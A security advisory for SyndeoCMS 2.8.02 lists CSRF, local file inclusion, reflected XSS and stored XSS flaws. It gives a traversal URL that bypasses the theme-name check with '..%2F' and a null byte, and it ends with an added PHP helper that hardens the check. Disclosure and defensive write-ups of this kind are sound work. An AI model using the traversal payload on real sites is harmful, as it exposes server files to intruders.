MOAUB
Day 4 (0day)

Title            : syndeocms 2.8.02 Multiple Vulnerabilities
Affected Version : syndeocms <= 2.8.02
Vendor Site      : http://www.syndeocms.org/
Discovery        : abysssec.com

Description :

This CMS has many critical vulnerabilities; some of them are described here:

Vulnerabilities :

1. CSRF - Add Admin Account:
. . . . . .
-------------------------------------

2. LFI (Local File Inclusion):

http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00

In the starnet\core\con_configuration.inc.php file, as you may have noticed, the theme parameter is checked for "../", and the check can be bypassed with "..%2F":

line 61-73:

    switch ($modoption) // start of switch
    {
        case save_css :
            if (IsSet ($_POST['content']))
            {
                $content = $_POST['content'];
            }
            if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us.
            {
                $filename = "themes/$theme/style.css";

-------------------------------------

3. XSS:

In the starnet\core\con_alerts.inc.php file, the "email" parameter when "modoption" is "save_alert":

http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2

4. Stored XSS:

In the starnet\core\con_alerts.inc.php file, the "name" parameter when "modoption" is "save_alert":

http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert

------------------------------
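
A hardened form of the theme check from item 2, as an added example that is not SyndeoCMS code or part of the original advisory: instead of searching the value for "../", it accepts only plain directory names and then confirms that the canonical path stays under the themes directory. The function name resolve_theme_css and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not SyndeoCMS code.
// Returns the canonical path of <themesDir>/<theme>/style.css, or null if
// the theme name is not a plain directory name or the file lies elsewhere.

function resolve_theme_css(string $themesDir, string $theme): ?string
{
    // 1. Allowlist the shape of the name. Separators, dots, percent signs
    //    and NUL bytes cannot pass, whatever encoding they arrived in.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme) !== 1) {
        return null;
    }

    // 2. Canonicalise both paths. realpath() returns false when the
    //    target does not exist.
    $base = realpath($themesDir);
    $file = realpath($themesDir . '/' . $theme . '/style.css');
    if ($base === false || $file === false) {
        return null;
    }

    // 3. Containment check on the canonical path, which also covers a
    //    symlinked theme directory that points outside $themesDir.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $file;
}

// Constructed demo data: a temporary themes directory with one theme.
$root = sys_get_temp_dir() . '/themes_demo_' . getmypid();
@mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/style.css', "body{}\n");

// Constructed inputs: one valid name, the two forms the advisory mentions,
// and a well-formed name with no matching theme.
$inputs = ['default', '../index.php', "..%2Findex.php\0", 'missing'];
foreach ($inputs as $t) {
    $result = resolve_theme_css($root, $t);
    printf("%-24s => %s\n",
        json_encode($t, JSON_UNESCAPED_SLASHES),
        $result === null ? 'rejected' : 'accepted');
}
```

The same helper should guard every code path that builds a filename from the theme value, including the edit and save branches of the switch.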